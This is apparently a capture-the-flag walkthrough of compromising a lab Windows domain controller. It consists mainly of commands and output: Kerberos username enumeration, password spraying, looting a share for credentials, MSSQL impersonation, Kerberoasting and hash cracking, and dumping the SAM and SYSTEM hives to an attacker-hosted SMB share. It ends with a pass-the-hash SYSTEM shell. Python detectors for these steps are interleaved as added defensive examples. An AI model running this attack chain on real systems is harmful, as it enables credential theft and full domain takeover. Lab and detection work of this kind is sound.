Foothold

$ kerbrute userenum -d hokkaido-aerospace.com ~/opt/Top_50_Female_Firstnames.Surname.txt --dc dc.hokkaido-aerospace.com 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 08/25/24 - Ronnie Flathers @ropnop

2024/08/25 07:00:06 >  Using KDC(s):
2024/08/25 07:00:06 >  	dc.hokkaido-aerospace.com:88

2024/08/25 07:00:42 >  [+] VALID USERNAME:	 GRACE.LEES@hokkaido-aerospace.com
2024/08/25 07:01:39 >  [+] VALID USERNAME:	 MOLLY.SMITH@hokkaido-aerospace.com
2024/08/25 07:01:39 >  [+] VALID USERNAME:	 MOLLY.EDWARDS@hokkaido-aerospace.com
2024/08/25 07:01:47 >  [+] VALID USERNAME:	 HANNAH.O'NEILL@hokkaido-aerospace.com
2024/08/25 07:02:08 >  Done! Tested 25000 usernames (4 valid) in 121.831 seconds
$ kerbrute userenum -d hokkaido-aerospace.com /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc dc.hokkaido-aerospace.com 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 08/25/24 - Ronnie Flathers @ropnop

2024/08/25 07:07:11 >  Using KDC(s):
2024/08/25 07:07:11 >  	dc.hokkaido-aerospace.com:88

2024/08/25 07:07:16 >  [+] VALID USERNAME:	 info@hokkaido-aerospace.com
2024/08/25 07:07:22 >  [+] VALID USERNAME:	 administrator@hokkaido-aerospace.com
2024/08/25 07:07:28 >  [+] VALID USERNAME:	 INFO@hokkaido-aerospace.com
2024/08/25 07:07:52 >  [+] VALID USERNAME:	 Info@hokkaido-aerospace.com
2024/08/25 07:08:19 >  [+] VALID USERNAME:	 discovery@hokkaido-aerospace.com
2024/08/25 07:08:23 >  [+] VALID USERNAME:	 Administrator@hokkaido-aerospace.com
2024/08/25 07:19:13 >  [+] VALID USERNAME:	 maintenance@hokkaido-aerospace.com
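Kerbrute's userenum sends AS-REQs without pre-authentication, so the KDC answers every probe with an error: KDC_ERR_C_PRINCIPAL_UNKNOWN for a name that does not exist and KDC_ERR_PREAUTH_REQUIRED for one that does, which is how the [+] VALID USERNAME lines above are produced. Each probe is also written to the DC's security log as event 4768 with the same result codes. The Python below is an added example, not part of this writeup: it runs over constructed 4768 records (the source addresses, timestamps and most names are made up) and raises an alert for any source that has asked about a burst of non-existent principals, listing alongside it the real accounts that source has just confirmed.

```python
"""Flag Kerberos user enumeration in Windows security event 4768 records.

Added example, not part of the original writeup. The records below are
constructed to resemble what a kerbrute userenum run leaves in the domain
controller's security log; field names follow the 4768 event's data.
"""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass, field

# 4768 result codes (Kerberos KRB-ERROR values, as the event shows them).
KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"   # no such account: the name was a miss
KDC_ERR_PREAUTH_REQUIRED = "0x19"     # account exists; KDC wants pre-auth
KDC_SUCCESS = "0x0"

# Constructed sample events: (TimeCreated, TargetUserName, IpAddress, Status).
# One source works through a wordlist; on a workstation a user mistypes a
# name once and then logs in normally.
SAMPLE_EVENTS = [
    ("2024-08-25T07:00:05", "alice.jones", "::ffff:192.168.45.233", "0x6"),
    ("2024-08-25T07:00:05", "amy.brown",   "::ffff:192.168.45.233", "0x6"),
    ("2024-08-25T07:00:06", "ann.taylor",  "::ffff:192.168.45.233", "0x6"),
    ("2024-08-25T07:00:06", "grace.lees",  "::ffff:192.168.45.233", "0x19"),
    ("2024-08-25T07:00:07", "beth.white",  "::ffff:192.168.45.233", "0x6"),
    ("2024-08-25T07:00:07", "carol.hall",  "::ffff:192.168.45.233", "0x6"),
    ("2024-08-25T07:00:08", "molly.smith", "::ffff:192.168.45.233", "0x19"),
    ("2024-08-25T07:00:09", "hazel.gren",  "::ffff:192.168.193.50", "0x6"),
    ("2024-08-25T07:00:12", "hazel.green", "::ffff:192.168.193.50", "0x0"),
]


@dataclass
class EnumerationAlert:
    source: str                      # IpAddress field of the 4768 events
    unknown_names: int               # distinct names that did not exist
    existing_names_probed: list[str] = field(default_factory=list)


def detect_user_enumeration(events, min_unknown: int = 5) -> list[EnumerationAlert]:
    """Group 4768 events by source and alert on any source that asked the KDC
    about at least `min_unknown` distinct non-existent principals.

    The 0x19 responses from the same source are reported too: they are the
    real accounts the enumerator has just confirmed, i.e. the names most
    likely to be sprayed next.
    """
    unknown: dict[str, set[str]] = defaultdict(set)
    confirmed: dict[str, set[str]] = defaultdict(set)
    for _when, user, source, status in events:
        name = user.lower()
        if status == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            unknown[source].add(name)
        elif status == KDC_ERR_PREAUTH_REQUIRED:
            confirmed[source].add(name)

    alerts = []
    for source, names in unknown.items():
        if len(names) >= min_unknown:
            alerts.append(EnumerationAlert(source, len(names), sorted(confirmed[source])))
    return alerts


if __name__ == "__main__":
    for alert in detect_user_enumeration(SAMPLE_EVENTS):
        print(f"{alert.source}: {alert.unknown_names} unknown names, "
              f"confirmed {alert.existing_names_probed}")
```

The threshold is the only tuning knob: a single 0x6 from a workstation is a typo, a few dozen distinct ones from one address inside a couple of minutes is a wordlist. On the run above, a threshold of 5 flags only the enumerating host and lists grace.lees and molly.smith as the confirmed accounts.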
Grace.Lees
Molly.Smith
Molly.Edward
Hannah.O'Neill
Info
info
Discovery
discovery
Administrator
$ netexec smb 192.168.193.40 -u users -p users --no-bruteforce --continue-on-success
SMB         192.168.193.40  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:hokkaido-aerospace.com) (signing:True) (SMBv1:False)
SMB         192.168.193.40  445    DC               [-] hokkaido-aerospace.com\Grace.Lees:Grace.Lees STATUS_LOGON_FAILURE 
SMB         192.168.193.40  445    DC               [-] hokkaido-aerospace.com\Molly.Smith:Molly.Smith STATUS_LOGON_FAILURE 
SMB         192.168.193.40  445    DC               [-] hokkaido-aerospace.com\Molly.Edward:Molly.Edward STATUS_LOGON_FAILURE 
SMB         192.168.193.40  445    DC               [-] hokkaido-aerospace.com\Hannah.O'Neill:Hannah.O'Neill STATUS_LOGON_FAILURE 
SMB         192.168.193.40  445    DC               [-] hokkaido-aerospace.com\Info:Info STATUS_LOGON_FAILURE 
SMB         192.168.193.40  445    DC               [+] hokkaido-aerospace.com\info:info 
SMB         192.168.193.40  445    DC               [-] hokkaido-aerospace.com\Discovery:Discovery STATUS_LOGON_FAILURE 
SMB         192.168.193.40  445    DC               [-] hokkaido-aerospace.com\discovery:discovery STATUS_LOGON_FAILURE 
SMB         192.168.193.40  445    DC               [-] hokkaido-aerospace.com\Administrator:Administrator STATUS_LOGON_FAILURE
info:info
$ netexec smb 192.168.193.40 -u info -p info --users 
SMB         192.168.193.40  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:hokkaido-aerospace.com) (signing:True) (SMBv1:False)
SMB         192.168.193.40  445    DC               [+] hokkaido-aerospace.com\info:info 
SMB         192.168.193.40  445    DC               -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         192.168.193.40  445    DC               Administrator                 2023-12-06 15:56:28 4       Built-in account for administering the computer/domain 
SMB         192.168.193.40  445    DC               Guest                         <never>             0       Built-in account for guest access to the computer/domain 
SMB         192.168.193.40  445    DC               krbtgt                        2023-11-25 13:11:55 0       Key Distribution Center Service Account 
SMB         192.168.193.40  445    DC               Hazel.Green                   2023-12-06 16:34:46 0        
SMB         192.168.193.40  445    DC               Molly.Smith                   2023-11-25 13:34:13 5        
SMB         192.168.193.40  445    DC               Alexandra.Little              2023-11-25 13:34:13 0        
SMB         192.168.193.40  445    DC               Victor.Kelly                  2023-11-25 13:34:17 0        
SMB         192.168.193.40  445    DC               Catherine.Knight              2023-11-25 13:34:17 0        
SMB         192.168.193.40  445    DC               Angela.Davies                 2023-11-25 13:34:17 0        
SMB         192.168.193.40  445    DC               Molly.Edwards                 2023-11-25 13:34:17 0        
SMB         192.168.193.40  445    DC               Tracy.Wood                    2023-11-25 13:34:17 0        
SMB         192.168.193.40  445    DC               Lynne.Tyler                   2023-11-25 13:34:17 0        
SMB         192.168.193.40  445    DC               Charlene.Wallace              2023-11-25 13:34:17 0        
SMB         192.168.193.40  445    DC               Cheryl.Singh                  2023-11-25 13:34:17 0        
SMB         192.168.193.40  445    DC               Sian.Gordon                   2023-11-25 13:34:17 0        
SMB         192.168.193.40  445    DC               Gordon.Brown                  2023-11-25 13:34:17 0        
SMB         192.168.193.40  445    DC               Irene.Dean                    2023-11-25 13:34:17 0        
SMB         192.168.193.40  445    DC               Anthony.Anderson              2023-11-25 13:34:17 0        
SMB         192.168.193.40  445    DC               Julian.Davies                 2023-11-25 13:34:17 0        
SMB         192.168.193.40  445    DC               Hannah.O'Neill                2023-11-25 13:34:18 5        
SMB         192.168.193.40  445    DC               Rachel.Jones                  2023-11-25 13:34:18 0        
SMB         192.168.193.40  445    DC               Declan.Woodward               2023-11-25 13:34:18 0        
SMB         192.168.193.40  445    DC               Annette.Buckley               2023-11-25 13:34:18 0        
SMB         192.168.193.40  445    DC               Elliott.Jones                 2023-11-25 13:34:18 0        
SMB         192.168.193.40  445    DC               Grace.Lees                    2023-11-25 13:34:18 5        
SMB         192.168.193.40  445    DC               Deborah.Francis               2023-11-25 13:34:18 0        
SMB         192.168.193.40  445    DC               Bruce.Cartwright              2023-11-25 13:34:21 0        
SMB         192.168.193.40  445    DC               Nigel.Brown                   2023-11-25 13:34:21 0        
SMB         192.168.193.40  445    DC               Derek.Wyatt                   2023-11-25 13:34:21 0        
SMB         192.168.193.40  445    DC               discovery                     2023-12-06 15:42:56 4        
SMB         192.168.193.40  445    DC               maintenance                   2023-11-25 13:39:04 0        
SMB         192.168.193.40  445    DC               hrapp-service                 2023-11-25 14:14:40 0        
SMB         192.168.193.40  445    DC               info                          2023-12-06 15:43:50 0 
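The BadPW column in the listing above is each account's badPwdCount, and the accounts sitting at 4 and 5 are the ones the username-as-password spray touched (info is back at 0 because its successful logon reset the counter). The Python below is an added example, not code from this writeup: it parses a cut-down copy of the listing above, embedded as sample input, and returns the accounts whose counter is at or above a threshold. The same parser runs unchanged over a full `netexec smb --users` dump.

```python
"""Pull accounts with a raised bad-password counter out of netexec's
`smb --users` output.

Added example, not part of the original writeup. SAMPLE_OUTPUT is a cut-down
copy of the listing above; the parser works on the full listing too.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

SAMPLE_OUTPUT = r"""
SMB         192.168.193.40  445    DC               [+] hokkaido-aerospace.com\info:info 
SMB         192.168.193.40  445    DC               -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         192.168.193.40  445    DC               Administrator                 2023-12-06 15:56:28 4       Built-in account for administering the computer/domain 
SMB         192.168.193.40  445    DC               Guest                         <never>             0       Built-in account for guest access to the computer/domain 
SMB         192.168.193.40  445    DC               krbtgt                        2023-11-25 13:11:55 0       Key Distribution Center Service Account 
SMB         192.168.193.40  445    DC               Hazel.Green                   2023-12-06 16:34:46 0        
SMB         192.168.193.40  445    DC               Molly.Smith                   2023-11-25 13:34:13 5        
SMB         192.168.193.40  445    DC               Hannah.O'Neill                2023-11-25 13:34:18 5        
SMB         192.168.193.40  445    DC               Grace.Lees                    2023-11-25 13:34:18 5        
SMB         192.168.193.40  445    DC               discovery                     2023-12-06 15:42:56 4        
SMB         192.168.193.40  445    DC               maintenance                   2023-11-25 13:39:04 0        
SMB         192.168.193.40  445    DC               hrapp-service                 2023-11-25 14:14:40 0        
SMB         192.168.193.40  445    DC               info                          2023-12-06 15:43:50 0 
"""

# One account row: the netexec prefix (protocol, host, port, hostname), then
# username, last-password-set (a timestamp or <never>), badPwdCount, and an
# optional description.
ROW = re.compile(
    r"^SMB\s+\S+\s+\d+\s+\S+\s+"
    r"(?P<user>\S+)\s+"
    r"(?P<pwset>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}|<never>)\s+"
    r"(?P<badpw>\d+)\s*"
    r"(?P<desc>.*?)\s*$"
)


@dataclass
class UserRow:
    username: str
    last_pw_set: str | None   # None when netexec printed <never>
    bad_pw_count: int
    description: str


def parse_netexec_users(text: str) -> list[UserRow]:
    """Parse the account table; banner, login and header lines are skipped
    because they do not match the row pattern."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue
        pwset = None if m["pwset"] == "<never>" else m["pwset"]
        rows.append(UserRow(m["user"], pwset, int(m["badpw"]), m["desc"]))
    return rows


def accounts_with_failed_logons(rows: list[UserRow], minimum: int = 3) -> list[tuple[str, int]]:
    """Accounts whose badPwdCount is at or above `minimum`, highest count first
    and alphabetical within a count.

    badPwdCount is not replicated between DCs and is reset by a successful
    logon, so a non-zero value is recent: here it is the footprint of the
    spray shown earlier on this page.
    """
    hits = [(r.username, r.bad_pw_count) for r in rows if r.bad_pw_count >= minimum]
    return sorted(hits, key=lambda pair: (-pair[1], pair[0].lower()))


if __name__ == "__main__":
    for name, count in accounts_with_failed_logons(parse_netexec_users(SAMPLE_OUTPUT)):
        print(f"{name}: badPwdCount={count}")
```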
$ netexec smb 192.168.193.40 -u info -p info --shares                                                                         
SMB         192.168.193.40  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:hokkaido-aerospace.com) (signing:True) (SMBv1:False)
SMB         192.168.193.40  445    DC               [+] hokkaido-aerospace.com\info:info 
SMB         192.168.193.40  445    DC               [*] Enumerated shares
SMB         192.168.193.40  445    DC               Share           Permissions     Remark
SMB         192.168.193.40  445    DC               -----           -----------     ------
SMB         192.168.193.40  445    DC               ADMIN$                          Remote Admin
SMB         192.168.193.40  445    DC               C$                              Default share
SMB         192.168.193.40  445    DC               homes           READ,WRITE      user homes
SMB         192.168.193.40  445    DC               IPC$            READ            Remote IPC
SMB         192.168.193.40  445    DC               NETLOGON        READ            Logon server share 
SMB         192.168.193.40  445    DC               SYSVOL          READ            Logon server share 
SMB         192.168.193.40  445    DC               UpdateServicesPackages READ            A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
SMB         192.168.193.40  445    DC               WsusContent     READ            A network share to be used by Local Publishing to place published content on this WSUS system.
SMB         192.168.193.40  445    DC               WSUSTemp                        A network share used by Local Publishing from a Remote WSUS Console Instance.
$ netexec smb 192.168.193.40 -u info -p info -M spider_plus
SMB         192.168.193.40  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:hokkaido-aerospace.com) (signing:True) (SMBv1:False)
SMB         192.168.193.40  445    DC               [+] hokkaido-aerospace.com\info:info 
SPIDER_PLUS 192.168.193.40  445    DC               [*] Started module spidering_plus with the following options:
SPIDER_PLUS 192.168.193.40  445    DC               [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 192.168.193.40  445    DC               [*]     STATS_FLAG: True
SPIDER_PLUS 192.168.193.40  445    DC               [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 192.168.193.40  445    DC               [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 192.168.193.40  445    DC               [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 192.168.193.40  445    DC               [*]  OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB         192.168.193.40  445    DC               [*] Enumerated shares
SMB         192.168.193.40  445    DC               Share           Permissions     Remark
SMB         192.168.193.40  445    DC               -----           -----------     ------
SMB         192.168.193.40  445    DC               ADMIN$                          Remote Admin
SMB         192.168.193.40  445    DC               C$                              Default share
SMB         192.168.193.40  445    DC               homes           READ,WRITE      user homes
SMB         192.168.193.40  445    DC               IPC$            READ            Remote IPC
SMB         192.168.193.40  445    DC               NETLOGON        READ            Logon server share 
SMB         192.168.193.40  445    DC               SYSVOL          READ            Logon server share 
SMB         192.168.193.40  445    DC               UpdateServicesPackages READ            A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
SMB         192.168.193.40  445    DC               WsusContent     READ            A network share to be used by Local Publishing to place published content on this WSUS system.
SMB         192.168.193.40  445    DC               WSUSTemp                        A network share used by Local Publishing from a Remote WSUS Console Instance.
SPIDER_PLUS 192.168.193.40  445    DC               [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/192.168.193.40.json".
SPIDER_PLUS 192.168.193.40  445    DC               [*] SMB Shares:           9 (ADMIN$, C$, homes, IPC$, NETLOGON, SYSVOL, UpdateServicesPackages, WsusContent, WSUSTemp)
SPIDER_PLUS 192.168.193.40  445    DC               [*] SMB Readable Shares:  6 (homes, IPC$, NETLOGON, SYSVOL, UpdateServicesPackages, WsusContent)
SPIDER_PLUS 192.168.193.40  445    DC               [*] SMB Writable Shares:  1 (homes)
SPIDER_PLUS 192.168.193.40  445    DC               [*] SMB Filtered Shares:  1
SPIDER_PLUS 192.168.193.40  445    DC               [*] Total folders found:  44
SPIDER_PLUS 192.168.193.40  445    DC               [*] Total files found:    8
SPIDER_PLUS 192.168.193.40  445    DC               [*] File size average:    1.21 KB
SPIDER_PLUS 192.168.193.40  445    DC               [*] File size min:        0 B
SPIDER_PLUS 192.168.193.40  445    DC               [*] File size max:        5.8 KB
$ smbclient '\\192.168.193.40\NETLOGON' -U info%info
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Nov 25 07:40:08 2023
  ..                                  D        0  Sat Nov 25 07:17:33 2023
  temp                                D        0  Wed Dec  6 09:44:26 2023

		7699711 blocks of size 4096. 1862906 blocks available
smb: \> cd temp
smb: \temp\> ls
  .                                   D        0  Wed Dec  6 09:44:26 2023
  ..                                  D        0  Sat Nov 25 07:40:08 2023
  password_reset.txt                  A       27  Sat Nov 25 07:40:29 2023

		7699711 blocks of size 4096. 1862906 blocks available
smb: \temp\> mget password_reset.txt 
Get file password_reset.txt? y
getting file \temp\password_reset.txt of size 27 as password_reset.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \temp\> exit
discovery:Start123!
$ impacket-GetUserSPNs hokkaido-aerospace.com/info:'info' -dc-ip 192.168.193.40 -request

Hash uncrackable

$ impacket-mssqlclient hokkaido-aerospace.com/discovery:'Start123!'@192.168.193.40 -windows-auth
Impacket v0.12.0.dev1+20240807.21946.829239e - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (HAERO\discovery  guest@master)> 
SQL (HAERO\discovery  guest@master)> enum_impersonate
execute as   database   permission_name   state_desc   grantee          grantor          
----------   --------   ---------------   ----------   --------------   --------------   
b'LOGIN'     b''        IMPERSONATE       GRANT        HAERO\services   hrappdb-reader 
SQL (hrappdb-reader  hrappdb-reader@hrappdb)> select * from hrappdb.information_schema.tables;
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE   
-------------   ------------   ----------   ----------   
hrappdb         dbo            sysauth      b'BASE TABLE'   
hrapp-service:Untimed$Runny
$ bloodhound-python -d hokkaido-aerospace.com -u hrapp-service -p 'Untimed$Runny' -ns 192.168.193.40 -c all
INFO: Found AD domain: hokkaido-aerospace.com
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.hokkaido-aerospace.com
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.hokkaido-aerospace.com
INFO: Found 34 users
INFO: Found 62 groups
INFO: Found 2 gpos
INFO: Found 6 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: 
INFO: Querying computer: dc.hokkaido-aerospace.com
INFO: Done in 00M 10S
$ python targetedKerberoast.py -v -d hokkaido-aerospace.com -u hrapp-service -p 'Untimed$Runny'
$ hashcat -m 13100 hazel.hash ~/rockyou.txt -O
hazel.green:haze1988

Password reset

$ rdesktop -u molly.smith -p 'Pwned123!' -d hokkaido-aerospace.com 192.168.193.40 
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Users\molly.smith> whoami
haero\molly.smith
PS C:\Users\molly.smith> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::ffd:7d4d:cb9f:8ac%6
   IPv4 Address. . . . . . . . . . . : 192.168.193.40
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.193.254
PS C:\Users\molly.smith> type C:\local.txt
04659bc80b4e3d55e4ead4cfc2417113
PS C:\Users\molly.smith>
PS C:\Windows\system32> reg save hklm\sam c:\programdata\sam
The operation completed successfully.
PS C:\Windows\system32> reg save hklm\system c:\programdata\system
The operation completed successfully.
$ impacket-smbserver share share/ -smb2support -username adot -password adot
PS C:\programdata> net use A: \\192.168.45.233\share
Enter the user name for '192.168.45.233': adot
Enter the password for 192.168.45.233:
The command completed successfully.

PS C:\programdata> move sam A:
PS C:\programdata> move system A:
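Saving the SAM and SYSTEM hives with reg.exe, as above, is the step that makes offline hash extraction possible, and it appears verbatim in process-creation telemetry (Sysmon event 1, or Windows 4688 with command-line logging enabled). The Python below is an added example, not from this writeup: it runs over constructed event records (field names follow Sysmon's Image, User and CommandLine; the values are made up apart from the two commands taken from above) and reports every reg.exe save of a credential hive, tolerating case differences, quoting and the HKEY_LOCAL_MACHINE spelling of the root.

```python
"""Spot SAM/SYSTEM/SECURITY hive exports in process-creation telemetry.

Added example, not part of the original writeup. The event dicts below are
constructed; the field names (Image, CommandLine, User) follow Sysmon
event ID 1, but only CommandLine is inspected.
"""
from __future__ import annotations

import ntpath
import shlex

# Registry roots that hold the local credential material.
ROOT_ALIASES = {"hklm": "hklm", "hkey_local_machine": "hklm"}
CREDENTIAL_HIVES = {"sam", "system", "security"}

# Constructed sample events. The first two mirror the commands run on the
# box above; the rest are benign uses of reg.exe or unrelated processes.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\reg.exe", "User": r"HAERO\molly.smith",
     "CommandLine": r"reg save hklm\sam c:\programdata\sam"},
    {"Image": r"C:\Windows\System32\reg.exe", "User": r"HAERO\molly.smith",
     "CommandLine": r'"C:\Windows\system32\reg.exe"  SAVE  "HKEY_LOCAL_MACHINE\SYSTEM"  C:\programdata\system /y'},
    {"Image": r"C:\Windows\System32\reg.exe", "User": r"HAERO\svc-backup",
     "CommandLine": r"reg query hklm\software\microsoft\windows\currentversion\run"},
    {"Image": r"C:\Windows\System32\reg.exe", "User": r"HAERO\hazel.green",
     "CommandLine": r"reg save hkcu\software\contoso c:\temp\contoso.hiv"},
    {"Image": r"C:\Windows\System32\notepad.exe", "User": r"HAERO\hazel.green",
     "CommandLine": "notepad.exe sam.txt"},
]


def windows_argv(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, honouring double quotes
    and leaving backslashes untouched (shlex's POSIX mode would eat them)."""
    lex = shlex.shlex(cmdline, posix=False)
    lex.whitespace_split = True
    lex.commenters = ""          # '#' is legal in Windows paths
    return [tok.strip('"') for tok in lex]


def parse_reg_save(cmdline: str) -> dict | None:
    """Return {root, hive, destination} if the command line is a reg.exe
    'save' of a credential hive, else None."""
    argv = windows_argv(cmdline)
    if len(argv) < 3:
        return None
    exe = ntpath.basename(argv[0]).lower()
    if exe not in ("reg", "reg.exe") or argv[1].lower() != "save":
        return None
    root, _, rest = argv[2].partition("\\")
    root = ROOT_ALIASES.get(root.lower())
    hive = rest.split("\\", 1)[0].lower()
    if root is None or hive not in CREDENTIAL_HIVES:
        return None
    destination = argv[3] if len(argv) > 3 and not argv[3].startswith("/") else None
    return {"root": root, "hive": hive, "destination": destination}


def find_hive_exports(events: list[dict]) -> list[dict]:
    """Run parse_reg_save over process-creation events and return the hits,
    each tagged with the user who ran the command."""
    hits = []
    for ev in events:
        match = parse_reg_save(ev.get("CommandLine", ""))
        if match:
            hits.append({"user": ev.get("User"), **match})
    return hits


if __name__ == "__main__":
    for hit in find_hive_exports(SAMPLE_EVENTS):
        print(f"{hit['user']} exported {hit['root']}\\{hit['hive']} to {hit['destination']}")
```

Pairing the hit with the file paths it names is what makes the follow-up cheap: the same two destinations reappear a moment later in the `net use` and `move` commands that ship them off the host, so a hive save followed by a write to a newly mapped drive from the same session is the sequence to alert on.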
$ impacket-smbexec Administrator@192.168.193.40 -hashes :d752482897d54e239376fddb2a2109e4
Impacket v0.12.0.dev1+20240807.21946.829239e - Copyright 2023 Fortra

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>type C:\Users\Administrator\Desktop\proof.txt
711bd85182a76970c9e738ff14598685
C:\Windows\system32>ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::ece8:e6da:6712:f805%6
   IPv4 Address. . . . . . . . . . . : 192.168.193.40
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.193.254
